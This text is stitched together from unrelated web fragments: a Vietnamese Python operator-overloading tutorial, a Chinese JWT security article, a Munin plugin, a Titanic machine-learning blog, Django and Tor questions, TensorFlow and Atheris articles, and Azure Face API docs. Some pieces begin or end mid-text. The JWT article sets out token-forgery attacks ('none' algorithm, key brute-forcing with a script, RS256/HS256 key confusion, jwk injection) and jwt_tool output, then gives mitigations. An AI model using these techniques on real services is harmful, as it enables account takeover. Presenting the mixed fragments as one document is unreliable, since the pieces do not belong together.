def __init__(self, x = 0, y = 0):
self.x = x
self.y = y
def __str__(self):
return "({0},{1})".format(self.x,self.y)
def __add__(self,other):
x = self.x + other.x
y = self.y + other.y
return Point(x,y)
Ta chạy chương trình và nhập vào các điểm:
>>> p1 = Point(2,3)
>>> p2 = Point(-1,2)
>>> print(p1 + p2)
(1,5)
Ở chương trình này, khi bạn thực hiện p1 + p2, Python sẽ gọi ra p1.__add__(p2).
Tương tự như vậy, bạn có thể nạp chồng nhiều toán tử khác. Quantrimang xin giới thiệu một số hàm đặc biệt dùng cho nạp chồng toán tử trong bảng dưới đây:
TOÁN TỬ BIỂU DIỄN HOẠT ĐỘNG
Phép cộng p1 + p2 p1.__add__(p2)
Phép trừ p1 - p2 p1.__sub__(p2)
Phép nhân p1 * p2 p1.__mul__(p2)
Lũy thừa p1 ** p2 p1.__pow__(p2)
Phép chia p1 / p2 p1.__truediv__(p2)
Phép chia lấy phần nguyên (Floor Division) p1 // p2 p1.__floordiv__(p2)
Số dư (modulo) p1 % p2 p1.__mod__(p2)
Thao tác trên bit: phép dịch trái p1 << p2 p1.__lshift__(p2)
Thao tác trên bit: phép dịch phải p1 >> p2 p1.__rshift__(p2)
Thao tác trên bit: phép AND p1 & p2 p1.__and__(p2)
Thao tác trên bit: phép OR p1 | p2 p1.__or__(p2)
Thao tác trên bit: phép XOR p1 ^ p2 p1.__xor__(p2)
Thao tác trên bit: phép NOT ~p1 p1.__invert__()
Nạp chồng toán tử so sánh trong Python
Python không chỉ giới hạn được phép nạp chồng các toán tử toán học, mà còn cho phép người dùng nạp chồng toán tử so sánh.
Có nhiều toán tử so sánh được hỗ trợ bởi Python, ví dụ như: <, >, <=, >=, ==,...
Bạn sử dụng nạp chồng toán tử này khi muốn so sánh các đối tượng trong lớp với nhau.
Ví dụ bạn muốn so sánh các điểm trong class Point, hãy so sánh độ lớn của các điểm này bắt đầu từ gốc tọa độ, thực hiện như sau:
class Point:
def __init__(self, x = 0, y = 0):
self.x = x
self.y = y
def __str__(self):
return "({0},{1})".format(self.x,self.y)
def __lt__(self,other):
self_mag = (self.x ** 2) + (self.y ** 2)
other_mag = (other.x ** 2) + (other.y ** 2)
return self_mag < other_mag
Ta chạy chương trình và nhập vào các điểm và toán tử dùng để só sánh:
>>> Point(1,1) < Point(-2,-3)
True
>>> Point(1,1) < Point(0.5,-0.2)
False
>>> Point(1,1) < Point(1,1)
False
Tương tự như vậy, bạn có thể nạp chồng nhiều toán tử so sánh khác. Quantrimang xin giới thiệu một số hàm đặc biệt dùng cho nạp chồng toán tử so sánh trong bảng dưới đây:
TOÁN TỬ BIỂU DIỄN HOẠT ĐỘNG
Nhỏ hơn p1 < p2 p1.__lt__(p2)
Nhỏ hơn hoặc bằng p1 <= p2 p1.__le__(p2)
Bằng p1 == p2 p1.__eq__(p2)
Khác p1 != p2 p1.__ne__(p2)
Lớn hơn p1 > p2 p1.__gt__(p2)
Lớn hơn hoặc bằng p1 >= p2 p1.__ge__(p2)
Xem thêm:
Nạp chồng toán tử trong C#
Nạp chồng toán tử quan hệ trong C++
Lập trình hướng đối tượng trong Python
|
文章最后更新时间为:2019年11月22日 11:59:42
相对于传统的session-cookie身份校验机制,Token Auth正在变得流行,也就是说把token信息全部存在于客户端。这篇文章就讲讲Token Auth的一种,jwt机制。
jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT可用于身份认证、会话状态维持、信息交换等。
一个jwt token由三部分组成,header、payload与signature,以点隔开,形如xxx.yyy.zzz。
下面就是一个具体token的例子:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
header用来声明token的类型和签名用的算法等,需要经过Base64Url编码。比如以上token的头部经过base64解码后为{"alg":"HS256","typ":"JWT"}
# Base64Url编码如下所示
from base64 import *
def base64URLen(s):
t0=b64encode(s)
t1=t0.strip('=').replace('+','-').replace('/','_')
return t1
def base64URLde(s):
t0=s.replace('-','+').replace('_','/')
t1=t0+'='*(4-len(t0)%4)%4
return b64decode(t1)
payload用来表示真正的token信息,也需要经过Base64Url编码。比如以上token的payload经过解码后为{"sub":"1234567890","name":"John Doe","iat":1516239022}
signature,将前两部分用alg指定的算法加密,再经过Base64Url编码就是signature了。
所以解码jwt token之后,内容大致如下:
一般我们遇到jwt字符串可以到https://jwt.io/这个网站解密。
我们能够轻松解码payload和header,因为这两个都只经过Base64Url编码,而有的时候开发者会误将敏感信息存在payload中。
某些服务端并未校验JWT签名,所以,可以尝试修改signature后(或者直接删除signature)看其是否还有效。
头部用来声明token的类型和签名用的算法等,比如:
{
"alg": "HS256",
"typ": "JWT"
}
以上header指定了签名算法为HS256,意味着服务端利用此算法将header和payload进行加密,形成signature,同时接收到token时,也会利用此算法对signature进行签名验证。
但是如果我们修改了签名算法会怎么样?比如将header修改为:
{
"alg": "none",
"typ": "JWT"
}
那么服务端接收到token后会将其认定为无加密算法, 于是对signature的检验也就失效了,那么我们就可以随意修改payload部分伪造token。
https://jwt.io/#debugger将alg为none视为恶意行为,所以,无法通过在线工具生成JWT,可以用python的jwt库来实现:
用none算法生成的JWT只有两部分了,根本连签名都不存在。
jwt使用算法对header和payload进行加密,如果我们可以爆破出加密密钥,那么也就可以随意修改token了。
这里有一个python版本的jwt爆破脚本:https://github.com/Ch1ngg/JWTPyCrack
也可以快速用以下脚本爆破:
jwt_str = "xxx.ttt.zzz"
path = "D:/keys.txt"
alg = "HS256"
with open(path,encoding='utf-8') as f:
for line in f:
key_ = line.strip()
try:
jwt.decode(jwt_str,verify=True,key=key_,algorithm=alg)
print('found key! --> ' + key_)
break
except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
print('found key! --> ' + key_)
break
except(jwt.exceptions.InvalidSignatureError):
continue
else:
print("key not found!")
JWT的签名加密算法有两种,对称加密算法和非对称加密算法。
对称加密算法比如HS256,加解密使用同一个密钥,保存在后端。
非对称加密算法比如RS256,后端加密使用私钥,前端解密使用公钥,公钥是我们可以获取到的。
如果我们修改header,将算法从RS256更改为HS256,后端代码会使用RS256的公钥作为HS256算法的密钥。于是我们就可以用RS256的公钥伪造数据
jwk是header里的一个参数,用于指出密钥,存在被伪造的风险。比如CVE-2018-0114: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0114
攻击者可以通过以下方法来伪造JWT:删除原始签名,向标头添加新的公钥,然后使用与该公钥关联的私钥进行签名。
比如:
{
"typ": "JWT",
"alg": "RS256",
"jwk": {
"kty": "RSA",
"kid": "TEST",
"use": "sig",
"e": "AQAB",
"n": "oUGnPChFQAN1xdA1_f_FWZdFAis64o5hdVyFm4vVFBzTIEdYmZZ3hJHsWi5b_m_tjsgjhCZZnPOLn-ZVYs7pce__rDsRw9gfKGCVzvGYvPY1hkIENNeBfSaQlBhOhaRxA85rBkg8BX7zfMRQJ0fMG3EAZhYbr3LDtygwSXi66CCk4zfFNQfOQEF-Tgv1kgdTFJW-r3AKSQayER8kF3xfMuI7-VkKz-yyLDZgITyW2VWmjsvdQTvQflapS1_k9IeTjzxuKCMvAl8v_TFj2bnU5bDJBEhqisdb2BRHMgzzEBX43jc-IHZGSHY2KA39Tr42DVv7gS--2tyh8JluonjpdQ"
}
}
此工具可用于测试jwt的安全性,地址是 https://github.com/ticarpi/jwt_tool
示例用法:
λ python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn 9dm15Po
$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$\
\__$$ |$$ | $\ $$ |\__$$ __| \__$$ __| $$ |
$$ |$$ |$$$\ $$ | $$ | $$ | $$$$$$\ $$$$$$\ $$ |
$$ |$$ $$ $$\$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ |
$$\ $$ |$$$$ _$$$$ | $$ | $$ |$$ / $$ |$$ / $$ |$$ |
$$ | $$ |$$$ / \$$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ |
\$$$$$$ |$$ / \$$ | $$ | $$ |\$$$$$$ |\$$$$$$ |$$ |
\______/ \__/ \__| \__|$$$$$$\__| \______/ \______/ \__|
Version 1.3 \______|
=====================
Decoded Token Values:
=====================
Token header values:
[+] typ = JWT
[+] alg = HS256
Token payload values:
[+] login = ticarpi
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
########################################################
# Options: #
# ==== TAMPERING ==== #
# 1: Tamper with JWT data (multiple signing options) #
# #
# ==== VULNERABILITIES ==== #
# 2: Check for the "none" algorithm vulnerability #
# 3: Check for HS/RSA key confusion vulnerability #
# 4: Check for JWKS key injection vulnerability #
# #
# ==== CRACKING/GUESSING ==== #
# 5: Check HS signature against a key (password) #
# 6: Check HS signature against key file #
# 7: Crack signature with supplied dictionary file #
# #
# ==== RSA KEY FUNCTIONS ==== #
# 8: Verify RSA signature against a Public Key #
# #
# 0: Quit #
########################################################
Please make a selection (1-6)
> 1
其中的选项分别为:
1. 修改JWT
2. 生成None算法的JWT
3. 检查RS/HS256公钥错误匹配漏洞
4. 检测JKU密钥是否可伪造
5. 输入一个key,检查是否正确
6. 输入一个存放key的文本,检查是否正确
7. 输入字典文本,爆破
8. 输入RSA公钥,检查是否正确
一般保证前两点基本就没什么漏洞了。
保证密钥的保密性
签名算法固定在后端,不以JWT里的算法为标准
避免敏感信息保存在JWT中
尽量JWT的有效时间足够短
|
qpid_discardsring
Sadly there is no documentation for this plugin.
#!/usr/bin/env python
#
# Plugin to monitor Apache Qpid
# - graphs the number of messages discarded from queue(s) specified in config
#
# Parameters understood:
#
# queues (required) - space separated list of queues to display (regex allowed)
#
# Made by Jimmy Jones (jimmyjones2 AT gmx DOT co DOT uk)
#
# Licence: GPLv2
#
import re
import sys
import os
from qmf.console import Session
if not "queues" in os.environ:
print >> sys.stderr, "Missing env.queues in config"
sys.exit(-1)
output_queue = []
sess = Session()
broker = sess.addBroker()
queues = sess.getObjects(_class="queue", _package="org.apache.qpid.broker")
for q in queues:
for match in os.environ["queues"].split(" "):
if re.match(match, q.name):
output_queue.append(re.sub('[^a-zA-Z0-9_]', '_', q.name))
if len(sys.argv) > 1 and sys.argv[1] == "config":
print "graph_category webserver";
print "graph_title Ring queue discard rate";
print "graph_vlabel messages/second";
for queue in output_queue:
print "%s.label %s" % (queue, queue)
print "%s.min 0" % queue
print "%s.type COUNTER" % queue
else:
for q in queues:
qname = re.sub('[^a-zA-Z0-9_]', '_', q.name)
if qname in output_queue:
print "%s.value %u" % (qname, q.discardsRing)
sess.delBroker(broker)
|
Firstly, the title is a joke. I really have no helpful insights to share as you’ll see from my work.
This will be split into a few sections
What is machine learning?
Train and test data
Visualising the training data
Creating a feature
Cleaning the data
Converting the data
Testing predictions with the test data
Final thoughts
It should definitely be mentioned that this is the furthest thing from a tutorial you will ever witness. I’m not writing to teach but to learn and tell bad jokes.
If you want a helpful tutorial (one that I helped me along), follow Titanic – Data Science Solutions on Kaggle.
What is Machine Learning?
One of the basic tasks in machine learning is classification. You want to predict something as either “A will happen” or “B will happen”. You can do this with historical data and selecting algorithms that are best fit for purpose.
The problem we are posed with is:
Knowing from a training set of samples listing passengers who survived or did not survive the Titanic disaster, can our model determine based on a given test dataset not containing the survival information, if these passengers in the test dataset survived or not.
Kaggle – Machine Learning From Disaster
2. Train and Test data
Kaggle, the data science website, has a beginner problem called “Titanic – Machine Learning from Disaster” where you’re given data about who survives the titanic crash with information about their age, name, number of siblings and so on. You’re then asked to predict the outcome for 400 people.
The original table looks something like this:
PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked
1 0 3 Braund, Mr. Owen Harris male 22.0 1 0 A/5 21171 7.2500 NaN S S
2 1 1 Cumings, Mrs. John Bradley (Florence Briggs Th… female 38.0 1 0 PC 17599 71.2833 C85 C C
3 1 3 Heikkinen, Miss. Laina female 26.0 0 0 STON/O2. 3101282 7.9250 NaN S S
4 1 1 Futrelle, Mrs. Jacques Heath (Lily May Peel) female 35.0 1 0 113803 53.1000 C123 S S
5 0 3 Allen, Mr. William Henry male 35.0 0 0 373450 8.0500 NaN S S
This is what we call “training data”. It is information that we know the outcome for and we can use this to make our fit our algorithms to then make a prediction.
There is also “test” data. It is similar to the data above but with the survived column removed. We will use this to check our predictions against and see how well our efforts have done with all of the visualisations and algorithm abuse we’re doing.
3. Visualising the data
To start with, it’s important to simply have a look at the data to see what insights we can gather from a birds eye view. Otherwise we’re just staring at tables and then hoping for the best.
I won’t go through everything (and yes, it is very rough) but we can gain some basic insights from this. It might influence whether we want to create any new features or focus on certain features when trying to predict survival rates.
For example, we can see from the box plots that most people were roughly 30 years old and had one sibling on board (2nd row, first two box plots). From the histograms, we can see that most people were in passenger class 3 (we have no idea what that means in real life) and a lot of people on the titanic (at least in this dataset) were pretty young.
How does this impact survival? I’m glad you asked. Let’s look at some more graphs.
Now, we could just make predictions based off these factors if we really wanted to. However, we can also create features based on the information that we have. This is called feature engineering.
4. Creating a feature
I know, this seems like I’m playing God with data. In part, that is why I’m doing this. To feel something.
We have their names with their titles includes. We can extract their titles and create a feature called “Title”. With this, we’ll also be able to make a distinction between whether people with fancy titles were saved first or married women and so on.
for dataset in new_combined:
dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\.', expand=False)
You don’t need to understand everything or the variables here. They are specific to the code written which is found on my GitHub.
It basically takes the name “Braund, Mr. Owen Harris” and finds a pattern of the kind A-Za-z with a dot at the end. When this code is run, it’ll take out “Mr.” because it fits that pattern. If it was written as “mr” then the code would miss the title and ignore the name. It’s great, I’ll definitely be using the str.extract feature again.
5. Cleaning the data
A lot of data is bad. Data can regularly contain missing values, mistakes or simply be remarkably unhelpful for our goals. I’ve been told that this is large part of the workflow when trying to solve problems that require prediction.
We can get this information pretty quickly:
new_combined.info() #This tells us all the non-null values in the data set
new_combined.isna().sum() #This tells us which rows have null values (it's quicker then the first method)
In the titanic data set, we have loads of missing data in the “age” column and a small amount in the “embarked” column.
For the “age” section, I followed the advice from the tutorial linked above and guessed the ages based on their passenger class, and sex.
For the “embarked” section, because there were so few missing values, I filled them in using the most common location someone embarked on.
As you can see, cleaning data requires some assumptions to be made and can utilise different techniques. It is definitely something to keep in mind as datasets get bigger and messier. The dataset I’m working with is actually pretty good which is likely a luxury.
It isn’t sexy but important. I suppose that’s the case with many things in life.
5. Converting the data
In order for this information to be useful to an algorithm, we need to make sure that he information we have in our table is numerical.
We can do this by mapping groups of information to numbers. I did this for all features.
It basically follows this format:
for item in new_combined:
item.Sex = item.Sex.map({"male":0, "female":1}).astype(int)
It is important to note that this only works if all of the info is filled in (which is why the previous step is so important).
For features that have a large number of entries (for example, “age” could potentially have 891 unique values), we can group them together so we have a smaller number of numerical values. This is the same for “fare” and the “title” feature created earlier.
It is basically the same as above but there is one prior step – creating the bands! It is simply using the “pd.cut()” feature. This segments whichever column we specify into the number of bands we want. Then we use those bands and say something like:
“If this passenger is between the age of 0 and 16, we’ll assign them a “1”.”
Our final table will look like this:
Survived Pclass Sex Age SibSp Parch Fare Embarked Title
0 3 0 1 1 0 0.0 1 3
1 1 1 2 1 0 3.0 3 4
1 3 1 1 0 0 1.0 1 2
1 1 1 2 1 0 3.0 1 4
0 3 0 2 0 0 1.0 1 3
6. Testing predictions with the test data
Now we have a table prepared for our predictions, we can select algorithms, fit them to our training data, then make a prediction.
While the previous stages were definitely frustrating to wrap my head around, this section certainly exposed just how much more there is to learn! Exciting but somewhat demoralising.
There are multiple models you can use to create predictions and there are also multiple ways to test whether what you have done is accurate.
So again, this is not a tutorial. Just an expose of my poor ability.
Funnily enough, I also think this is where it went wrong. My predictions don’t really make any sense.
To set the scene – we have:
A table of features we’ll use to make a prediction (the above table) = X
A prediction target (the “survived” column) = y
We can split our data into 4 sections and it looks like so:
train_X, val_X, train_y, val_y = train_test_split(X, y, random_state = 0)
This splits our data into the four variables I’ve specified. “Random_state = 0” just means we get the same data split every time the script is run (so randomised data splits is false).
Now we can define our models. I picked a variety of different models to see what results I would get and will hopefully be able to explain the models in another post. However, a detailed understanding of them isn’t necessary at the moment.
I used two linear models and four non-linear models. The most accurate model I used was “SVC” or Support Vector Classification.
SVM = SVC(gamma='auto')
#Defines the model
SVM.fit(train_X.drop(["Survived"],axis=1), train_y) #Allows the model to "learn" from the data we have provided
Y_prediction = SVM.predict(test_X.drop(["PassengerId"], axis=1)) #predicts the values that should be in the "survived" column
acc_log = round(SVM.score(train_X.drop(["Survived"],axis=1), train_y) * 100, 2)
# Returns the mean accuracy based on the labels provided
acc_log # returns the accuracy as a percentage
My final result was 83.7% accuracy!
My first attempt led me to a 99.7% accuracy – Ain’t no way! And the kicker? It predicted everyone would die!
At this point, my brain rightfully died and I submitted my prediction to the Kaggle competition with it being better than 77% of other users. So there is much room for improvement.
8. Final thoughts
This is a beginner problem designed to help people get used to the basics of machine learning so the dataset is better than you’d usually get in the real world.
As I was working through this, I noticed that there are a lot of decisions we can make when creating a prediction. It sounds obvious but it’s important. This is where normal cognitive biases creep in which can go unnoticed – especially when the information we’re working with is far more complex and less complete.
For example, if any of the features were less complete, our decisions on how to fill them in would make a greater impact on our decisions. The algorithms we choose are never a one size fits all solution (which is why we often test many).
I’ll publish my code on my GitHub page when I’ve cleaned it up slightly and removed the swear words.
I’ve probably made a really dumb mistake somewhere so if you feel like looking at the code, please do let me know what that might be…
And with that, I bring it to an end.
There will be much more to improve and learn but I’m glad I’ve given this a shot.
Recent Data Science Somedays posts
|
I use the code from the documentation to paginate the data:
try:
data = paginator.page(request.GET.get('page'))
except PageNotAnInteger:
page = 1
data = paginator.page(1)
except EmptyPage:
data = paginator.page(paginator.num_pages)
And a page:
<div class="pagination">
<span class="step-links">
{% if data.has_previous %}
<a href="?page={{ data.previous_page_number }}">previous</a>
{% endif %}
<span class="current">
<b>Page</b> {{ data.number }} of {{ data.paginator.num_pages }}
</span>
{% if data.has_next %}
<a href="?page={{ data.next_page_number }}">next</a>
{% endif %}
</span>
</div>
But there's a bug here: when the url contains a query string and one clicks on the Pager, the original query string gets lost. For example:
example.com?var1=33&var2=44
and then when one clicks on "page2", the url becomes
example.com?page=2 # var1=33&var2=44 is lost
instead of:
example.com?var1=33&var2=44&page=2
I haven't found neither the standard, nor easy way to fix it. How can I do that?
UPDATE:
of course, the names of the parameters, their values and whether they exist or not is not known.
|
I can get the current with this stem code.
#!/bin/python
from stem import CircStatus
from stem.control import Controller
with Controller.from_port(port = 9051) as controller:
controller.authenticate()
for circ in sorted(controller.get_circuits()):
if circ.status != CircStatus.BUILT:
continue
print("Circuit %s" % (circ.id))
How would you list all tor circuits that have ever been established from the moment that tor has been started?
To make things clear, instead of listing the current circuit only (say number 7) I want to list all c
|
মার্চ ১১, ২০২০ — Posted by Guest author Hannes Hapke, Senior Machine Learning Engineer at SAP’s Concur Labs. Edited by Robert Crowe on behalf of the TFX team.
Transformer models, especially the BERT model, have revolutionized NLP and broken new ground on tasks such as sentiment analysis, entity extractions, or question-answer problems. BERT models allow data scientists to stand on the shoulders of giants. When th…
Figure 1: Current BERT deployments
Figure 2: TFX pipeline with tf.Text
vocab_file_path = load_bert_layer().resolved_object.vocab_file.asset_path
bert_tokenizer = text.BertTokenizer(vocab_lookup_table=vocab_file_path,
token_out_type=tf.int64,
lower_case=do_lower_case)
...
input_word_ids = tokenize_text(text)
input_mask = tf.cast(input_word_ids > 0, tf.int64)
input_mask = tf.reshape(input_mask, [-1, MAX_SEQ_LEN])
zeros_dims = tf.stack(tf.shape(input_mask))
input_type_ids = tf.fill(zeros_dims, 0)
input_type_ids = tf.cast(input_type_ids, tf.int64)
Figure 3: BERT tokenizer
Figure 4: BERT layer
মার্চ ১১, ২০২০ — Posted by Guest author Hannes Hapke, Senior Machine Learning Engineer at SAP’s Concur Labs. Edited by Robert Crowe on behalf of the TFX team.
Transformer models, especially the BERT model, have revolutionized NLP and broken new ground on tasks such as sentiment analysis, entity extractions, or question-answer problems. BERT models allow data scientists to stand on the shoulders of giants. When th…
|
Google recently announced the open-sourcing of a new fuzzy testing engine for Python. The new fuzzer, Atheris, strives to find bugs in Python code and native extensions in Python 2.7 and Python 3.3+. Atheris can be used in combination with the Address Sanitizer and Undefined Behavior Sanitizer tools that detect memory corruption bugs and undefined behavior (e.g., buffer overflows, misaligned or null pointers).
Google explained the value that Atheris seeks to add to the current space of fuzzy testing engines:
Fuzz testing is a well-known technique for uncovering programming errors. Many of these detectable errors have serious security implications. Google has found thousands of security vulnerabilities and other bugs using this technique. Fuzzing is traditionally used on native languages such as C or C++, but last year, we built a new Python fuzzing engine.
Atheris can be used on Python code (Python 2.7 and Python 3.3+, with Python 3.8+ strongly recommended for better code coverage support) and native extensions written for CPython. When fuzzing native code, Atheris can be used in combination with Clang’s Address Sanitizer or Undefined Behavior Sanitizer to catch extra bugs.
An example of Python code fuzzing is as follows:
import atheris
import sys
def TestOneInput(data):
if data == b"bad":
raise RuntimeError("Badness!")
atheris.Setup(sys.argv, TestOneInput)
atheris.Fuzz()
The TestOneInput is the function under test. The function under test will be called repeatedly by Atheris with automatically generated inputs until a crash or an exception occurs.
The function admits one input (data) that is a bytes container. Atheris provides a FuzzedDataProvider that supports fuzzing with additional input shapes (e.g., string, list, integers, floats, intervals). Atheris can be used with the property-based testing tool Hypothesis to write fuzz harnesses, and shrink an input causing a malfunction to a smaller reproducible failure case. Hypothesis additionally provides advanced input-generation strategies (e.g., email, dictionaries, dates, regexp) that complement Atheris’ fuzzed data provider.
Atheris is a coverage-guided (grey-box) fuzzing engine. Atheris leverages Clang’s libFuzzer to instrument the code under test and collect coverage information. Atheris then dynamically tries to generate inputs that increase the code coverage generated by previous input sequences.
While Atheris takes care of test case generation and test execution, it is the onus of the programmer to recognize erroneous behaviors of the function under test. This may be achieved by using cross-referencing oracles (differential fuzzing). In this method, as with more generic metamorphic testing methods, two implementations of the same specifications are run on the same input with differences in results being singled out for analysis.
If a test oracle or metamorphic property is not available, programmers can still use fuzzing to detect malfunctions. This is the case when the function under test raises unexpected exceptions or fails a fault-detection mechanism.
Google gives the following example of the usefulness of checking for unexpected exceptions:
As an example, the one YAML parsing library we tested Atheris on says that it will only raise YAMLErrors; however, yaml_fuzzer.py detects numerous other exceptions, such as ValueError from trying to interpret “-_” as an integer, or TypeError from trying to use a list as a key in a dict. (Bug report.) This indicates flaws in the parser.
Differential fuzzing and fuzz testing are powerful automated testing techniques that have found many bugs in existing software — C compilers, Java decompilers, antivirus software, and more. Nick Fitzgerald recently explained in an InfoQ interview how generative testing allows finding bugs that are not easy to detect with other methods:
There’s a ton that we miss with basic unit testing, where we write out some fixed set of inputs and assert that our program produces the expected output. We overlook some code paths or we fail to exercise certain program states. […]
Testing pseudo-random inputs helps us avoid our own biases by feeding our system “unexpected” inputs. It helps us find integer overflow bugs or pathological inputs that allow (untrusted and potentially hostile) users to trigger out-of-memory bugs or timeouts that could be leveraged as part of a denial of service attack.
Fitzgerald reported finding bugs in the wasmparser crate’s validator. Google recently reported that 50 interns who participated in Google’s OSS internship initiative reported over 150 security vulnerabilities and 750 functional bugs.
|
March 30, 2018 — Posted by Josh Gordon, Developer Advocate for TensorFlow
One of the things that’s so fundamental in software development that it’s easy to overlook is the idea of a repository of shared code. As programmers, libraries immediately make us more effective. In a sense, they change the problem solving process of programming. When using a library, we often think of programming in terms of building bloc…
"Ingredients" of a machine learning model that can be packaged and shared through TensorFlow Hub. In a sense, sharing a pre-trained model also shares the compute time and dataset used to develop the model, in addition to architecture itself.
# Download and use NASNet feature vector module.
module = hub.Module(
“https://tfhub.dev/google/imagenet/nasnet_large/feature_vector/1")
features = module(my_images)
logits = tf.layers.dense(features, NUM_CLASSES)
probabilities = tf.nn.softmax(logits)
The basic idea is to reuse an existing image recognition module to extract features from your images, and then train a new classifier on top of these. As you can see above, TensorFlow Hub modules can be instantiated from a URL (or, from a filesystem path) while a TensorFlow graph is being constructed. There are variety of modules on TensorFlow Hub for you to choose from, including various flavors of NASNet, MobileNet (including its recent V2), Inception, ResNet, and others. To use a module, you import TensorFlow Hub, then copy/paste the module’s URL into your code.
Some of the image modules available on TensorFlow Hub.
# Download a module and use it to retrieve word embeddings.
embed = hub.Module(“https://tfhub.dev/google/nnlm-en-dim50/1")
embeddings = embed([“The movie was great!”])
As before, we start by selecting a module. TensorFlow Hub has a variety of text modules for you to explore, including Neural network language models in a variety of languages (EN, JP, DE, and ES), as well as Word2vec trained on Wikipedia, and NNLM embeddings trained on Google News.
Some of the text modules shared on TensorFlow Hub.
A text classification tutorial using TensorFlow Hub.
This notebook shows how to train simple binary text classifier on top of any TF-Hub module that can embed sentences.
# Use pre-trained universal sentence encoder to build text vector
review = hub.text_embedding_column(
“review”, “https://tfhub.dev/google/universal-sentence-encoder/1")
features = {
“review”: np.array([“this movie is a masterpiece”, “this movie was terrible”, …])
}
labels = np.array([[1], [0], …])
input_fn = tf.estimator.input.numpy_input_fn(features, labels, shuffle=True)
estimator = tf.estimator.DNNClassifier(hidden_units, [review])
estimator.train(input_fn, max_steps=100)
Check out the this tutorial to learn more.
March 30, 2018 — Posted by Josh Gordon, Developer Advocate for TensorFlow
One of the things that’s so fundamental in software development that it’s easy to overlook is the idea of a repository of shared code. As programmers, libraries immediately make us more effective. In a sense, they change the problem solving process of programming. When using a library, we often think of programming in terms of building bloc…
|
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
FaceList - Add Face
Add a face to a specified face list, up to 1,000 faces.
To deal with an image containing multiple faces, input face can be specified as an image with a targetFace rectangle. It returnsa persistedFaceId representing the added face. No image will be stored. Only the extracted face feature(s) will be stored on server untilFaceList - Delete Face orFaceList - Delete is called.
Note persistedFaceId is different from faceId generated byFace - Detect.
Higher face image quality means better detection and recognition precision. Please consider high-quality faces: frontal, clear, and face size is 200x200 pixels (100 pixels between eyes) or bigger.
JPEG, PNG, GIF (the first frame), and BMP format are supported. The allowed image file size is from 1KB to 6MB.
"targetFace" rectangle should contain one face. Zero or multiple faces will be regarded as an error. If the provided "targetFace" rectangle is not returned from Face - Detect, there’s no guarantee to detect and add the face successfully.
Out of detectable face size (36x36 - 4096x4096 pixels), large head-pose, or large occlusions will cause failures.
Adding/deleting faces to/from a same face list are processed sequentially and to/from different face lists are in parallel.
The minimum detectable face size is 36x36 pixels in an image no larger than 1920x1080 pixels. Images with dimensions higher than 1920x1080 pixels will need a proportionally larger minimum face size.
Different 'detectionModel' values can be provided. To use and compare different detection models, please refer to How to specify a detection model
'detection_01': The default detection model for FaceList - Add Face. Recommend for near frontal face detection. For scenarios with exceptionally large angle (head-pose) faces, occluded faces or wrong image orientation, the faces in such cases may not be detected.
'detection_02': Detection model released in 2019 May with improved accuracy especially on small, side and blurry faces.
Http Method
POST
Select the testing console in the region where you created your resource:
West US West US 2 East US East US 2 West Central US South Central US West Europe North Europe Southeast Asia East Asia Australia East Brazil South Canada Central Central India UK South Japan East Central US France Central Korea Central Japan West North Central US South Africa North UAE North
Request URL
Request parameters
Valid character is letter in lower case or digit or '-' or '_', maximum length is 64.
User-specified data about the face list for any purpose. The maximum length is 1KB.
A face rectangle to specify the target face to be added into the face list, in the format of "targetFace=left,top,width,height". E.g. "targetFace=10,10,100,100". If there is more than one face in the image, targetFace is required to specify which face to add. No targetFace means there is only one face detected in the entire image.
The 'detectionModel' associated with the detected faceIds. Supported 'detectionModel' values include "detection_01" or "detection_02". The default value is "detection_01".
Request headers
Request body
JSON fields in request body:
Fields Type Description
url String Image url. Image file size should be between 1KB and 6MB. Only one face is allowed per image.
{
"url": "http://example.com/1.jpg"
}
[binary data]
Response 200
A successful call returns a new persistedFaceId.
JSON fields in response body:
Fields Type Description
persistedFaceId String persistedFaceId of the added face, which is persisted and will not expire. Different from faceId which is created in Face - Detect and will expire in 24 hours after the detection call.
{
"persistedFaceId": "B8D802CF-DD8F-4E61-B15C-9E6C5844CCBA"
}
Response 400
Error code and message returned in JSON:
Error Code Error Message Description
BadArgument Bad and unrecognizable JSON body.
BadArgument 'userData' is too long.
BadArgument Argument targetFace out of range, targetFace is valid but it's intersection with the entire image is empty.
